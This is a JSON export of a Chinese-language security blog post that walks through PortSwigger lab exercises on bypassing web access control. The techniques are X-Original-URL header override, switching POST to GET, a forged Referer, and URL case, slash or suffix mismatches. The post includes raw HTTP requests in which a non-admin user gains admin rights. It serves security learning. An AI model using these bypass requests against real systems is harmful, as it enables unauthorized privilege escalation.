{"id":1308,"date":"2023-03-11T18:13:00","date_gmt":"2023-03-11T10:13:00","guid":{"rendered":"https:\/\/systw.net\/note\/?p=1308"},"modified":"2026-01-10T15:29:08","modified_gmt":"2026-01-10T07:29:08","slug":"access-control-bypass","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/1308","title":{"rendered":"Bypass Access Control"},"content":{"rendered":"\n<p><\/p>\n\n\n\n<p>\u5b58\u53d6\u63a7\u5236\u5e38\u898b\u7684\u9952\u904e\u6a5f\u5236\u6709<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u4f7f\u7528\u8acb\u6c42\u982d\u9952\u904e\u5b58\u53d6\u9650\u5236<\/li>\n\n\n\n<li>\u4f7f\u7528\u4e0d\u540c\u8acb\u6c42\u65b9\u6cd5\u9952\u904e\u5b58\u53d6\u9650\u5236<\/li>\n\n\n\n<li>\u4fee\u6539refer\u9952\u904e\u5b58\u53d6\u9650\u5236<\/li>\n\n\n\n<li>URL \u5339\u914d\u5dee\u7570\u5c0e\u81f4\u5b58\u53d6\u63a7\u5236\u5931\u6548<\/li>\n<\/ul>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u4f7f\u7528\u8acb\u6c42\u982d\u9952\u904e\u5b58\u53d6\u9650\u5236<\/h3>\n\n\n\n<p>\u4e00\u4e9b\u61c9\u7528\u7a0b\u5f0f\u53ef\u80fd\u6703\u963b\u64cb\u4e00\u4e9b\u4f4d\u7f6e\uff0c\u4f8b\u5982<code>DENY: POST, \/admin\/deleteUser, managers<\/code>\u3002\u4f46\u5982\u679c\u61c9\u7528\u7a0b\u5f0f\u6846\u67b6\u5982\u679c\u652f\u63f4\u5404\u7a2e\u975e\u6a19\u6e96HTTP \u6a19\u982d\uff0c\u9019\u4e9b\u6a19\u982d\u53ef\u7528\u65bc\u8986\u5beb\u539f\u59cb\u8acb\u6c42\u4e2d\u7684URL\uff0c\u4f8b\u5982<code>X-Original-URL<\/code>\u548c<code>X-Rewrite-URL<\/code>\uff0c\u56e0\u6b64\u53ef\u80fd\u53ef\u4ee5\u7e5e\u904e\u5b58\u53d6\u9650\u5236<\/p>\n\n\n\n<p>\u7cfb\u7d71\u4f9d\u8cf4X-Original-URL\u505a\u70ba\u5224\u65b7\u4f86\u6e90\u7684\u7d50\u679c\uff0c\u53ea\u8981\u6539\u8b8a\u6b64\u4f4d\u7f6e\u5c31\u80fd\u9a19\u904e\u7cfb\u7d71\uff0c\u800c\u5f97\u5230admin\u5165\u53e3<\/p>\n\n\n\n<p>\u4f8b\u5982\uff0c\u524d\u7aef\u5df1\u7d93\u963b\u64cb\/admin\u9019\u500b\u4f4d\u7f6e\uff0c\u56e0\u6b64\u8acb\u6c42\u6642\u70ba\u8fd4\u56de\u5b58\u53d6\u88ab\u62d2<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############### request ##################\nGET \/admin HTTP\/2\n\n############### response ##################\nHTTP\/2 403 Forbidden\nContent-Type: application\/json; charset=utf-8\nX-Frame-Options: SAMEORIGIN\nContent-Length: 15\n\n\"Access denied\"<\/code><\/pre>\n\n\n\n<p>\u7531\u65bc\u5df1\u7d93\u77e5\u9053\u76ee\u6a19\u7db2\u7ad9\u652f\u6301X-Original-URL\uff0c\u56e0\u6b64\u4f7f\u7528\u4ee5\u4e0b\u65b9\u6cd5\u9952\u904e\u5b58\u53d6\u9650\u5236\uff0c\u770b\u5230\u7ba1\u7406\u5f8c\u53f0<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############### request ##################\nGET \/ HTTP\/2\nHost: 0a700091040178fe80a27bf700ea00ac.web-security-academy.net\n<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">X-Original-Url: \/admin<\/mark>\n...omit...\n\n############### response ##################\n...omit...\nAdmin panel\n...omit...\n\n<\/code><\/pre>\n\n\n\n<p>Lab: URL-based access control can be circumvented<\/p>\n\n\n\n<p>\u5176\u4ed6\u8acb\u6c42\u982d\u7684\u65b9\u6cd5\u4e5f\u53ef\u4ee5\u53c3\u8003 HOST header attack <a href=\"https:\/\/systw.net\/note\/archives\/1137\">https:\/\/systw.net\/note\/archives\/1137<\/a><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u4f7f\u7528\u4e0d\u540c\u8acb\u6c42\u65b9\u6cd5\u9952\u904e\u5b58\u53d6\u9650\u5236<\/h3>\n\n\n\n<p>\u67d0\u4e9b\u7db2\u7ad9\u5728\u57f7\u884c\u64cd\u4f5c\u6642\u53ef\u652f\u6301\u4e0d\u540c\u7684 HTTP \u8acb\u6c42\u65b9\u6cd5\uff0c\u5982\u679cPOST\u8acb\u6c42\u88ab\u9650\u5236\uff0c\u53ef\u4ee5\u5617\u8a66\u4f7f\u7528GET\u8acb\u6c42<\/p>\n\n\n\n<p>\u4f8b\u5982\uff0c\u76ee\u6a19\u7db2\u7ad9\u5206\u6790\u5f8c\u767c\u73fe\u63d0\u6b0a\u662f\u900f\u904eadmin-roles\u8acb\u6c42\u642d\u914daction=upgrade\u3002\u975e\u7ba1\u7406\u54e1carlos\u767b\u5165\u5f8c\uff0c\u5982\u679c\u60f3\u5617\u8a66\u81ea\u5df1\u7528action=upgrade\u529f\u80fd\u63d0\u6607\u6b0a\u9650\uff0c\u6703\u8fd4\u56de\u672a\u6388\u6b0a\u7121\u6cd5\u6210\u529f\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############### request ##################\nPOST \/admin-roles HTTP\/2\nHost: 0abf002c0389fb3b81bb0dc7009900af.web-security-academy.net\nCookie: session=mKzLj3PBS2h3826hYnRncTEUaRIiHePI\n...omit...\nusername=carlos&amp;action=upgrade\n\n############### response ##################\n...omit...\n\"Unauthorized\"<\/code><\/pre>\n\n\n\n<p>\u4f46\u6539\u8b8a\u6210<code>GET<\/code>\u65b9\u6cd5\u5f8c\uff0c\u5c31\u53ef\u4ee5\u6210\u529f\uff0c\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/admin-roles?username=carlos&amp;action=upgrade HTTP\/2\nHost: 0abf002c0389fb3b81bb0dc7009900af.web-security-academy.net\nCookie: session=mKzLj3PBS2h3826hYnRncTEUaRIiHePI\n...omit...\n\n############### response ##################\nHTTP\/2 302 Found\nLocation: \/admin\n...omit...<\/code><\/pre>\n\n\n\n<p>Lab: Method-based access control can be circumvented<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u4fee\u6539refer\u9952\u904e\u5b58\u53d6\u9650\u5236<\/h3>\n\n\n\n<p>\u6709\u4e9b\u7db2\u7ad9\u4f7f\u7528refer\u505a\u70ba\u6aa2\u67e5\u6a5f\u5236\uff0c\u5982\u679crefer\u4e0d\u7b26\u5408\u8981\u6c42\uff0c\u4e0d\u5141\u8a31\u8a72\u8acb\u6c42<\/p>\n\n\n\n<p>\u6839\u64da\u89c0\u5bdf\u767c\u73fe\u76ee\u6a19\u7db2\u7ad9\u63d0\u6b0a\u8acb\u6c42\u7528admin-roles\uff0c\u975e\u7ba1\u7406\u8005wiener\u767b\u5165\u5f8c\u4f7f\u7528\u6b64\u8acb\u6c42\u6703\u88ab\u62d2\u7d55<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/admin-roles?username=wiener&amp;action=upgrade HTTP\/2\nHost: 0abf002c0389fb3b81bb0dc7009900af.web-security-academy.net\nCookie: session=mKzLj3PBS2h3826hYnRncTEUaRIiHePI\n...omit...\n\n############### response ##################\n...omit...\n\"Unauthorized\"<\/code><\/pre>\n\n\n\n<p>\u6839\u64da\u89c0\u5bdf\u767c\u73fe\u76ee\u6a19\u7db2\u7ad9\u8acb\u6c42admin-roles\u4e0a\u4e00\u500b\u4f4d\u7f6e\u662f\/admin\uff0c\u56e0\u6b64\u8981\u5728refer\u52a0\u5165\u6b64\u4f4d\u7f6e\u624d\u53ef\u9952\u904e\u3002\u975e\u7ba1\u7406\u8005wiener\u767b\u5165\u5f8c\uff0c\u9700\u5c07refer\u52a0\u5165admin\u4f4d\u7f6e\uff0c\u5373\u53ef\u6210\u529f\u63d0\u6b0a\u5982\u4e0b<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/admin-roles?username=wiener&amp;action=upgrade HTTP\/2\nHost: 0abf002c0389fb3b81bb0dc7009900af.web-security-academy.net\nCookie: session=mKzLj3PBS2h3826hYnRncTEUaRIiHePI\n...omit...\n<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">refer: 0abf002c0389fb3b81bb0dc7009900af.web-security-academy.net\/admin<\/mark>\n\n############### response ##################\nHTTP\/2 302 Found\nLocation: \/admin\n...omit...<\/code><\/pre>\n\n\n\n<p>Lab: Referer-based access control<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">URL \u5339\u914d\u5dee\u7570\u5c0e\u81f4\u5b58\u53d6\u63a7\u5236\u5931\u6548<\/h3>\n\n\n\n<p>\u5728\u67d0\u4e9b\u60c5\u6cc1\uff0c\u4ee5\u4e0b\u662f\u7b49\u540c\u7684\uff0c\u5982\u679c\u76ee\u6a19\u53ea\u9650\u5236\u4e00\u7a2e\u5b58\u53d6\u4f4d\u7f6e\uff0c\u90a3\u53ef\u4ee5\u8a66\u53e6\u4e00\u500b\u4f4d\u7f6e\u5617\u8a66\u9952\u904e<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/admin\/deleteUser\n\/admin\/deleteUser\/\n\/ADMIN\/DELETEUSER<\/code><\/pre>\n\n\n\n<p>\u5982\u679c\u5728spring\u555f\u7528useSuffixPatternMatch\uff0c\u4ee5\u4e0b\u662f\u540c\u7b49\u7684\uff0cspring5.3\u4e4b\u524d\u9ed8\u8a8d\u555f\u7528\u3002<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>\/admin\/deleteUser.anything\n\/admin\/deleteUser<\/code><\/pre>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u5b58\u53d6\u63a7\u5236\u5e38\u898b\u7684\u9952\u904e\u6a5f\u5236\u6709 \u4f7f\u7528\u8acb\u6c42\u982d\u9952\u904e\u5b58\u53d6\u9650\u5236 \u4e00\u4e9b\u61c9\u7528\u7a0b &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"jetpack_social_options":{"image_generator_settings":{"template":"highway","default_image_id":0,"font":"","enabled":false},"version":2}},"categories":[367],"tags":[42],"class_list":["post-1308","post","type-post","status-publish","format-standard","hentry","category-logic-vulnerabilities","tag-bypass"],"jetpack_publicize_connections":[],"jetpack_featured_media_url":"","jetpack_sharing_enabled":true,"_links":{"self":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1308","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/comments?post=1308"}],"version-history":[{"count":1,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1308\/revisions"}],"predecessor-version":[{"id":2985,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/posts\/1308\/revisions\/2985"}],"wp:attachment":[{"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/media?parent=1308"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/categories?post=1308"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/systw.net\/note\/wp-json\/wp\/v2\/tags?post=1308"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}